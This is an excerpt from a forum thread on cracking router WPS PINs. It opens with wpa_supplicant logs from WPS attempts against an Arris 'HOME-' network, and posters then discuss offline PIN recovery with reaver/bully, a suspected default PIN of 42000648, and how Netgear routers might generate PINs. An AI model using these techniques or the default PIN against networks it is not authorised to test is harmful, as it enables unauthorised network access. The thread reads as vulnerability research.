<3>WPS-CRED-RECEIVED 100e003c102600010110450009484f4d452d38463432100300020022100f0002000c102700103144433845383039324139433030343110200006001dd6ab8f40
<3>WPS-FAIL msg=11 config_error=0
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>WPS-FAIL
<3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
<3>CTRL-EVENT-DISCONNECTED bssid=00:1d:d6:REDACTED reason=4
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
Other HOME-XXXX networks I have tested did produce a different pin. But I was unable to verify the pins as the wps process on the router crashed (?), I will try and verify the pins on those later.
But two of the HOME-XXXX(Arris routers) networks I tested produced the same pin, only one verified.
I was thinking more like, if wps is disabled in the settings, it doesn't actually disable, instead it just changes to the default pin of 42000648. Anyone else confirm?
Well someone else from Hack Forums reported the same exact issue and returned the same exact pins but thought they were just found in error so he didn't try them. He will try them in the next few days though...
Also, Comcast uses a few different gateways as well (SMC for example, which is also Ralink and vulnerable), so maybe that is why you got different PINs.
Last edited by soxrok2212; 2015-03-30 at 01:07.
To wn722
See thread #78 above posted by Soxrok2212
Any problems, write here and we will talk you through the process. Our problem is confirming the -pke and -pkr. Any commentary would be helpful.
MTeams
Dudux, I used the one pasted by soxrok that you asked him to post on Bitbucket. This one: https://bitbucket.org/dudux/wpsoffli...e.py?at=master
I've been digging through the source of bully/reaver also, looking for where they are parsed, so far nothing but dead ends, though I don't really know C very well either. Digging around where it mentions pubkey seems to be around where it would be though. Bear with me here, picking it up as I go. :-)
Hopefully something we can feed a pcap through to give all the required info, derive the pin, and if successful spawn reaver/bully to test and retrieve the psk. Though a live solution would be better ie a patch to bully/reaver.
Datahead and I began digging into Netgear routers' source and found some interesting bits of information. We think that we might have found how the actual PIN is generated... simply with a defined rand() function. It looks as if it uses the dev password (which can be found in the M1 packet in a WPS transaction) and has something to do with the system time. We are looking for help from crypto people who know what they are doing. It looks promising; the same thing was found in 2/2 checked source codes so far: WNDR3400v2 and R6300v1.
Very interesting what you say about Netgear... are you talking about the CG3100 series?
And... *** with the router with 2 PINs enabled? How did they manage that.... Incredible...
Very good work guys, it is impressive.